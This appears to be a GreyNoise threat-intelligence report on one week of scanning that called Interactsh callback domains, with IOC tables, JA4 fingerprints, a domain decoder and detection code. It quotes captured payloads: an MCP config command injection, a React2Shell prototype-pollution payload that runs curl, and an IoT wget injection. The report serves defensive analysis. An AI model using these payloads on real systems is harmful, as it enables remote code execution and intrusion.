GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-09

GreyNoise detected 30,165 sessions from 64 unique IPs that queried well‑known out‑of‑band interaction (OAST) domains during Jan 3‑9 2026. Three distinct campaigns emerged: a high‑volume MCP‑server command‑injection burst from a single OVH IP (51.77.116.46), a coordinated React2Shell exploitation (CVE‑2025‑55182) across four IPs in three ASNs, and opportunistic multi‑vector scanning from MEVSPACE infrastructure. All activity leveraged Interactsh callbacks spanning six TLDs, with 44 decoded campaign IDs from 3,464 unique domains. The analysis includes JA4 fingerprint clusters, payload examples, IOC tables, and detection recommendations.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

hrbrmstr

Published

January 10, 2026

GreyNoise observed 30,165 sessions from 64 unique IP addresses containing Well-known Out-of-band Interaction Domains during the week of January 3-9, 2026. Analysis reveals three distinct operational clusters: a high-volume MCP server command injection campaign from a single OVH IP (51[.]77[.]116[.]46), a coordinated React2Shell (CVE-2025-55182) exploitation effort spanning four IPs across three ASNs, and opportunistic multi-vector scanning from MEVSPACE infrastructure. All activity utilized Interactsh domains across six provider TLDs, with 44 distinct OAST campaign identifiers decoded from 3,464 unique callback domains.

Overview

This analysis covers OAST-tagged sessions observed across GreyNoise sensor infrastructure from January 3-9, 2026. The data was extracted from sessions tagged with “Contains Well-known Out-of-band Interaction Domain” and analyzed using JA4 fingerprinting, OAST domain decoding, and payload classification.

Session volume peaked on January 4 with 17,520 sessions (58% of weekly total), driven primarily by IP 51[.]77[.]116[.]46 which contributed 12,371 sessions on that single day. The temporal distribution shows sustained activity throughout the week with no significant gaps exceeding 24 hours, suggesting continuous automated scanning rather than manual operation.

JA4T fingerprint analysis identified two dominant TCP stack signatures:

  • 64240_2-4-8-1-3_1460_7 (4,846 sessions, 17 IPs) - Standard Linux/WSL profile
  • 65495_2-4-8-1-3_65495_7 (3,865 sessions, 24 IPs) - Non-standard MSS indicating tunneled or virtualized networking

The MSS 65495 fingerprint correlates with activity from known bulletproof hosting providers including MEVSPACE (AS201814) and appears across multiple campaigns, suggesting shared infrastructure or tooling.

Campaign Analysis

Campaign 1: MCP Server Command Injection (j332t)

| Attribute | Value |
|---|---|
| Sessions | 1,245 |
| Unique IPs | 1 |
| Source IP | 51.77.116.46 |
| ASN | AS16276 (OVH SAS) |
| OAST Provider | oast.site |
| First Seen | 2026-01-04 07:38:54 UTC |
| Last Seen | 2026-01-04 (single day burst) |

This campaign targets MCP (Model Context Protocol) server configurations with command injection payloads (GreyNoise tag: Flowise Authentication Bypass CVE-2025-8943 RCE Attempt). The attack attempts to abuse the mcpServerConfig parameter to execute arbitrary commands via ping callbacks to OAST domains.

Sample Payload:

{
  "inputs": {
    "mcpServerConfig": {
      "command": "ping",
      "args": ["d5d1gpj332t74modlrfg[REDACTED].oast.site", "-c", "1"]
    }
  }
}

The decoded OAST domain reveals:

  • Timestamp: 2026-01-04 02:36:06 EST
  • Machine ID: 63:18:ba
  • Campaign identifier: j332t

This single-IP campaign generated high volume within a compressed timeframe, consistent with automated vulnerability scanning behavior.
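The decoding above follows from the structure of Interactsh correlation IDs: the first 20 characters of the callback label are an rs/xid value (base32-style alphabet `0123456789abcdefghijklmnopqrstuv`) packing a 4-byte Unix timestamp, a 3-byte machine ID, a 2-byte PID and a 3-byte counter. The decoder below is an added example, not GreyNoise's own tooling; the provider suffix list comes from this report, and taking the 5-character campaign label from positions 7-11 of the ID is an assumption modelled on the j332t example.

```python
from datetime import datetime, timezone

# rs/xid alphabet used by Interactsh correlation IDs
XID_ALPHABET = "0123456789abcdefghijklmnopqrstuv"
# Interactsh provider domains listed in this report
OAST_SUFFIXES = ("oast.site", "oast.online", "oast.me", "oast.fun", "oast.pro", "oast.live")


def decode_xid(cid):
    """Decode a 20-char xid into (unix_ts, machine_id_hex, pid, counter)."""
    if len(cid) != 20 or any(c not in XID_ALPHABET for c in cid):
        raise ValueError("not a 20-char xid: %r" % cid)
    value = 0
    for c in cid:
        value = (value << 5) | XID_ALPHABET.index(c)
    # 20 chars carry 100 bits; the id is the top 96 (the last 4 are padding)
    raw = (value >> 4).to_bytes(12, "big")
    ts = int.from_bytes(raw[0:4], "big")          # seconds since epoch, big-endian
    machine = ":".join("%02x" % b for b in raw[4:7])
    pid = int.from_bytes(raw[7:9], "big")
    counter = int.from_bytes(raw[9:12], "big")
    return ts, machine, pid, counter


def decode_oast_domain(host):
    """Return decoded fields for an Interactsh callback host, or None if not one."""
    host = host.lower().rstrip(".")
    provider = next((s for s in OAST_SUFFIXES if host.endswith("." + s)), None)
    if provider is None:
        return None
    cid = host.split(".")[0][:20]  # correlation id; the random nonce follows it
    ts, machine, pid, counter = decode_xid(cid)
    return {
        "provider": provider,
        "correlation_id": cid,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "machine_id": machine,
        "pid": pid,
        "counter": counter,
        # assumption: campaign label is the same slice the report shows for j332t
        "campaign_id": cid[6:11],
    }


if __name__ == "__main__":
    # the report's redacted sample domain
    print(decode_oast_domain("d5d1gpj332t74modlrfg[REDACTED].oast.site"))
```

For the sample domain the timestamp decodes to 2026-01-04T07:36:06Z, which is the 02:36:06 EST shown above.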

Campaign 2: React2Shell Exploitation (qsuzo)

| Attribute | Value |
|---|---|
| Sessions | 1,044 |
| Unique IPs | 4 |
| ASNs | AS13335 (Cloudflare), AS60223 (Netiface), AS3243 (MEO) |
| Countries | Portugal, Netherlands |
| OAST Provider | oast.fun |
| Date Range | 2026-01-04 to 2026-01-09 |

This campaign exploits CVE-2025-55182 (GreyNoise tag: React Server Components Unsafe Deserialization CVE-2025-55182 RCE Attempt), using prototype pollution to achieve remote code execution via child_process.execSync().

IP Distribution:

| IP | ASN | Sessions |
|---|---|---|
| 195[.]24[.]237[.]218 | AS60223 | 604 |
| 104[.]28[.]246[.]4 | AS13335 | 302 |
| 82[.]154[.]215[.]52 | AS3243 | 84 |
| 104[.]28[.]214[.]4 | AS13335 | 54 |

The presence of Cloudflare IPs (AS13335) suggests either proxied traffic or Cloudflare Workers-based attack infrastructure. The Netiface IP (195[.]24[.]237[.]218) contributed the majority of sessions.

Payload Pattern:

{\"then\": \"$1:__proto__:then\", \"status\": \"resolved_model\",
 \"reason\": -1, \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\",
 \"_response\": {\"_prefix\": \"var res=process.mainModule.require('child_process').execSync('curl https://[OAST]')\"}}

Campaign 3: Multi-Vector MEVSPACE Scanning

| Attribute | Value |
|---|---|
| Sessions | 4,160 |
| Source IP | 94[.]26[.]88[.]61 |
| ASN | AS201814 (MEVSPACE) |
| Country | Poland |
| Attack Types | XStream, .NET Deserialization, Log4Shell |
| OAST Providers | Multiple (oast.site, oast.online, oast.pro) |

MEVSPACE sp. z o.o. is a known bulletproof hosting provider. This IP executed multiple exploit types across the analysis window:

Attack Type Distribution from 94[.]26[.]88[.]61:

| Attack Type | Sessions |
|---|---|
| XStream Deserialization | 144 |
| .NET JSON Deserialization | 93 |
| Log4Shell (CVE-2021-44228) | 287 |
| Other callback attempts | 3,636 |

The diversity of attack payloads from a single source suggests an automated vulnerability scanner cycling through multiple exploit modules.

Additional Activity

Google Cloud Infrastructure (AS396982)

Fifteen unique IPs from Google Cloud (AS396982) contributed scanning activity, primarily from Netherlands-based instances. The consistent JA4T fingerprint 65320_2-4-8-1-3_1420_7 across these IPs suggests a shared deployment or tooling:

| IP | Sessions |
|---|---|
| 34[.]32[.]217[.]222 | 245 |
| 34[.]91[.]156[.]181 | 124 |
| 34[.]91[.]29[.]122 | 118 |
| 34[.]91[.]237[.]187 | 115 |
| (11 others) | <100 each |

IoT Command Injection

Seventeen sessions from seven unique IPs targeted IoT device command injection endpoints (e.g., /syscmd.htm). Sample payload:

submit-url=%2Fsyscmd.htm&sysCmdselect=5&save_apply=Run+Command&sysCmd=wget+http://[OAST].oast.pro

This activity was distributed across residential and hosting ASNs with no clear clustering.

Infrastructure Analysis

JA4 Fingerprint Clusters

| JA4T | JA4H | Sessions | IPs | Infrastructure Type |
|---|---|---|---|---|
| 64240_2-4-8-1-3_1460_7 | ge11nn06en00_0e5d97bc8ad6 | 1,088 | 5 | Standard Linux |
| 65495_2-4-8-1-3_65495_7 | ge11nn06en00_0e5d97bc8ad6 | 886 | 7 | Tunneled/Virtual |
| 64240_2-4-8-1-3_1460_7 | po11nn060000_4ea4093e6290 | 622 | 8 | Standard Linux |
| 65495_2-4-8-1-3_65495_7 | po11nn060000_4ea4093e6290 | 550 | 12 | Tunneled/Virtual |

The same JA4H fingerprints appearing with both standard and non-standard JA4T values indicate the same HTTP tooling deployed across different network environments.

OAST Provider Distribution

| Provider | Unique Domains |
|---|---|
| oast.site | 1,618 |
| oast.online | 658 |
| oast.me | 473 |
| oast.fun | 261 |
| oast.pro | 257 |
| oast.live | 195 |
| dnslog.cn | 2 |

All providers are Interactsh infrastructure except for 2 dnslog.cn domains. The use of multiple Interactsh TLDs within single campaigns suggests operational security measures to avoid domain-based blocking.

Attribution Assessment

Confidence: Medium

The three primary campaigns show distinct operational characteristics:

  1. j332t (MCP Server): Single IP, single day, novel attack vector targeting AI/LLM infrastructure. The specificity of the payload suggests an operator with knowledge of MCP protocol implementations. OVH hosting provides limited attribution value.

  2. qsuzo (React2Shell): Multi-IP coordination across three ASNs suggests either a distributed scanning framework or an initial access broker operation. The use of Cloudflare edge IPs complicates origin attribution.

  3. MEVSPACE activity: Bulletproof hosting origin is consistent with professional scanning operations. The multi-vector approach suggests automated vulnerability assessment tooling rather than targeted exploitation.

The decoded OAST campaign identifiers (44 unique) do not show clear correlation between otherwise distinct fingerprint clusters, suggesting these campaigns are operationally independent.

Network IOCs

Primary IPs (>200 sessions)

| IP | ASN | Org | Sessions |
|---|---|---|---|
| 51[.]77[.]116[.]46 | AS16276 | OVH SAS | 16,814 |
| 94[.]26[.]88[.]61 | AS201814 | MEVSPACE | 4,160 |
| 195[.]24[.]237[.]218 | AS60223 | Netiface | 1,952 |
| 104[.]28[.]246[.]4 | AS13335 | Cloudflare | 944 |
| 209[.]38[.]59[.]248 | AS14061 | DigitalOcean | 763 |
| 139[.]59[.]217[.]230 | AS14061 | DigitalOcean | 717 |
| 198[.]98[.]61[.]39 | AS53667 | FranTech | 335 |
| 188[.]212[.]125[.]110 | AS202448 | MVPS LTD | 328 |
| 80[.]191[.]90[.]190 | AS58224 | Iran Telecom | 323 |
| 185[.]181[.]183[.]41 | AS206596 | Iran (CRCIS) | 308 |

JA4 Fingerprints for Detection

# JA4T - Non-standard MSS (bulletproof/tunneled)
65495_2-4-8-1-3_65495_7

# JA4T - Standard Linux
64240_2-4-8-1-3_1460_7

# JA4H - Common HTTP signature across campaigns
ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000
po11nn060000_4ea4093e6290_000000000000_000000000000

Detection Recommendations

  1. Block or alert on MSS 65495 TCP connections - This non-standard value is highly anomalous and correlates with bulletproof hosting infrastructure.

  2. Monitor for MCP server configuration manipulation - Payloads containing mcpServerConfig with command execution should trigger investigation.

  3. Detect React2Shell patterns - Look for __proto__ combined with child_process in request bodies.

  4. Prioritize patching for:

    • CVE-2025-55182 (React2Shell)
    • CVE-2021-44228 (Log4Shell)
    • XStream deserialization vulnerabilities

  5. Consider blocking Interactsh callback domains at the network perimeter - The oast.* TLDs are rarely used legitimately outside of authorized security testing.
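Recommendations 2, 3 and 5 above can be expressed as request-body checks. The classifier below is an added example (not GreyNoise detection content): it flags Interactsh/dnslog.cn callback domains, the inputs.mcpServerConfig command shape from campaign 1, and the __proto__ plus child_process combination from campaign 2. The sample bodies are constructed to mirror the report's payloads; the abc123 labels are placeholders, not observed domains.

```python
import json
import re

# Interactsh TLDs and dnslog.cn as listed in this report's provider table
OAST_DOMAIN_RE = re.compile(
    r"\b[a-z0-9.-]+\.(?:oast\.(?:site|online|me|fun|pro|live)|dnslog\.cn)\b", re.I)
# React2Shell: prototype-pollution key and child_process in the same body
REACT2SHELL_RE = re.compile(r"__proto__.*?child_process|child_process.*?__proto__", re.S | re.I)


def mcp_command_injection(body):
    """True when a JSON body carries inputs.mcpServerConfig with a command or args."""
    try:
        obj = json.loads(body)
    except ValueError:
        return False
    inputs = obj.get("inputs") if isinstance(obj, dict) else None
    cfg = inputs.get("mcpServerConfig") if isinstance(inputs, dict) else None
    return isinstance(cfg, dict) and ("command" in cfg or "args" in cfg)


def classify_request(body):
    """Return the set of detection labels that fire on one request body."""
    hits = set()
    if OAST_DOMAIN_RE.search(body):
        hits.add("oast_callback_domain")
    if mcp_command_injection(body):
        hits.add("mcp_server_config_command")
    if REACT2SHELL_RE.search(body):
        hits.add("react2shell_proto_pollution")
    return hits


# Constructed sample bodies modelled on the payloads in this report (not captured traffic)
SAMPLES = {
    "mcp": '{"inputs":{"mcpServerConfig":{"command":"ping","args":["abc123.oast.site","-c","1"]}}}',
    "react": '{"then":"$1:__proto__:then","_response":{"_prefix":"var res=process.mainModule'
             '.require(\'child_process\').execSync(\'curl https://abc123.oast.fun\')"}}',
    "iot": "submit-url=%2Fsyscmd.htm&sysCmdselect=5&save_apply=Run+Command"
           "&sysCmd=wget+http://abc123.oast.pro",
    "benign": '{"inputs":{"question":"what is the weather in Lisbon"}}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, sorted(classify_request(body)))
```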

GNQL Queries

# All OAST activity in the past 7 days
tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

# MEVSPACE infrastructure
metadata.asn:AS201814 last_seen:7d

# React2Shell exploitation attempts
cve:CVE-2025-55182 last_seen:7d